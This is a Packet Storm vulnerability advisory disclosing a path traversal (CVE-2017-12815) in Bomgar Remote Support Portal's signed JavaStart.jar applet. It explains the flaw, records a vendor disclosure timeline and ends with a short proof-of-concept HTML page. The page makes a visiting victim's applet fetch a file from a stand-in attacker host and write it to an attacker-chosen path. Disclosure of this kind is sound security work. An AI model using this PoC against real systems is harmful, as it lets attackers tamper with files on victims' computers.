Twenty Year Anniversary

Bomgar Remote Support Portal (RSP) Path Traversal

Bomgar Remote Support Portal (RSP) Path Traversal
Posted Mar 23, 2018
Authored by Filip Palian

Bomgar Remote Support Portal (RSP) suffers from a path traversal vulnerability.

tags | exploit, remote, file inclusion
advisories | CVE-2017-12815
MD5 | 3f40ab22e5c7a7b694af1162f8ab9899

Bomgar Remote Support Portal (RSP) Path Traversal

Change Mirror Download
Hey,

The Path Traversal vulnerability was found in the component of the Bomgar
Remote Support Portal (RSP) [1]. The affected component is a JavaStart.jar
applet that is hosted at https://TARGET/api/content/JavaStart.jar on the
vulnerable RSP deployments. The JavaStart version 52970 and prior were
confirmed to be vulnerable.

Analysis of the applet revealed that App.class suffers from a Path
Traversal vulnerability. The vulnerable class makes a call to a File()
constructor and uses the value specified in the "url" parameter as an
argument. The "url" parameter is specified in the <PARAM NAME> HTML tag
which passes arguments to applets embedded on web sites using an <APPLET>
HTML tag, in this case JavaStart.jar applet.

Successful exploitation results in the creation/modification/deletion of
files with the privilege of the user who runs the Java applet. In order to
exploit this vulnerability a victim would have to visit the attacker's
controlled website and allow the Java applet to execute.

It may be argued that the Path Traversal is not an issue in this case
because the victim has to download and run unknown code. While this is
usually correct, one needs to consider that anyone can embed the
JavaStart.jar applet on their website, while the applet can be hosted on a
legitimate/trustworthy location (i.e. for successful exploitation attacker
needs to control the <PARAM NAME>, not the contents of the archive or the
domain it is hosted at). Additonaly, the applet will be digitally signed
by a trustworthy organisation. Last but not least, the purpose of the
applet itself makes it easy to convince/trick users.

The final impact of the vulnerability heavily depends on additional
factors, such as operating system, web browser and its settings, Java
settings, user privileges running the applet etc. The vulnerability was
successfully executed on Windows 7 running IE 11 with its default
configuration. On Mac OS Sierra running Safari 10.1, the Java restrictions
prevented traversing outside of the temp/sandbox directory.

The PoC exploiting this vulnerability is included below:
--
$ cat > page.html << EOF
<html><body>
<applet code="com.bomgar.javastart.App.class"
archive="https://TARGET/api/content/JavaStart.jar">
<PARAM NAME="url" VALUE="http://ATTACKER/FILE_TO_WRITE">
</applet>
</body></html>
EOF
--

Contact vendor for remediation details.

Timeline:
11.08.2017: Initial contact email sent to info@bomgar.com with information
about the vulnerability.
11.08.2017: Notification sent to vendor that CVE-2017-12815 has been
assigned for this vulnerability by MITRE.
16.08.2017: No vendor response. Request sent to the vendor asking to
confirm they received previous email communication.
16.08.2017: Bomgar's Product Management team responded to the request and
information about the vulnerability was re-sent.
18.08.2017: Vendor confirms receving the information about the
vulnerability and informs that the development team is looking
into the issue.
26.08.2017: Vendor provides a status update and conclusions from the
performed analysis. Vendor plans to remove the capability of
the appliance to communicate with JavaStart.jar, to promote its
disuse as well as removing it from customer appliances in an
upcoming release.
26.08.2017: Asked vendor when the fixed version of their product will be
released and if they are interested in coordinating the
advisory release.
09.09.2017: Vendor provides a status update and informs the new release is
planned to be released in October 2017.
19.11.2017: No vendor response. Request for a status update.
10.02.2018: No vendor response. Notifying vendor about the planned advisory
release.
11.02.2018: Vendor requests the draft of the advisory.
20.03.2018: Advisory draft sent to the vendor for review along with
information about the planned release on 22.03.2018.
21.03.2018: Vendor requests minor updates to the timeline and .
23.03.2018: The advisory is released.

References:
[1] https://www.bomgar.com/remote-support/features/support-portals

Acknowledgments:
- Jonas Outlaw (Bomgar)
- Keith Kerr (Telstra)


Thanks,
Filip Palian

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

April 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    5 Files
  • 2
    Apr 2nd
    17 Files
  • 3
    Apr 3rd
    11 Files
  • 4
    Apr 4th
    21 Files
  • 5
    Apr 5th
    17 Files
  • 6
    Apr 6th
    12 Files
  • 7
    Apr 7th
    1 Files
  • 8
    Apr 8th
    6 Files
  • 9
    Apr 9th
    21 Files
  • 10
    Apr 10th
    18 Files
  • 11
    Apr 11th
    42 Files
  • 12
    Apr 12th
    7 Files
  • 13
    Apr 13th
    14 Files
  • 14
    Apr 14th
    1 Files
  • 15
    Apr 15th
    1 Files
  • 16
    Apr 16th
    15 Files
  • 17
    Apr 17th
    20 Files
  • 18
    Apr 18th
    24 Files
  • 19
    Apr 19th
    20 Files
  • 20
    Apr 20th
    7 Files
  • 21
    Apr 21st
    10 Files
  • 22
    Apr 22nd
    2 Files
  • 23
    Apr 23rd
    17 Files
  • 24
    Apr 24th
    35 Files
  • 25
    Apr 25th
    14 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close